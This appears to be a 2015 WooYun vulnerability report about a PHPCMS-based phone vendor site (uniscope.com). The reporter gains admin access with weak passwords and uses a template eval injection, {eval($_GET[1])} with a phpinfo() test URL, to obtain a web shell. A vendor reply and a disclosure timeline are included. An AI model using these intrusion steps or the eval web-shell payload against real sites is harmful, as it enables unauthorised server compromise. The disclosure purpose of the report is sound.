当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103409

漏洞标题:优思手机官网SHELL一枚

相关厂商:uniscope.com

漏洞作者: Sevck

提交时间:2015-04-28 17:11

修复时间:2015-06-12 17:18

公开时间:2015-06-12 17:18

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-08: 细节向核心白帽子及相关领域专家公开
2015-05-18: 细节向普通白帽子公开
2015-05-28: 细节向实习白帽子公开
2015-06-12: 细节向公众公开

简要描述:

闲来无事,读书都读不进去。看到一国产手机不错(UW2014),便去官网看了一下。
闲来无事,读书都读不进去。看到一国产手机不错(UW2014),便去官网看了一下。
闲来无事,读书都读不进去。看到一国产手机不错(UW2014),便去官网看了一下。
闲来无事,读书都读不进去。看到一国产手机不错(UW2014),便去官网看了一下。

详细说明:

http://www.uniscope.com/
发现是PHPCMS
剁手党一测。。http://www.uniscope.com/admin.php
输入了几个常见的弱口令
成功进入后台

后台.jpg


然后想到后台的SHELL的模版一个漏洞

2.1.jpg


OK,然后:
http://www.uniscope.com/index.php?1=phpinfo();

3.jpg


成功执行。
接下来把模板里的{eval($_GET[1])}改成{eval($_POST[1])}就可以拿到SHELL(info已经验证,不再累赘)

漏洞证明:

后台.jpg


2.1.jpg


3.jpg


修复方案:

版权声明:转载请注明来源 Sevck@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-28 17:17

厂商回复:

phpcms 漏洞比较大确实

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-21 15:31 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    @uniscope.com 提交你们网站的漏洞 有没有手机送啊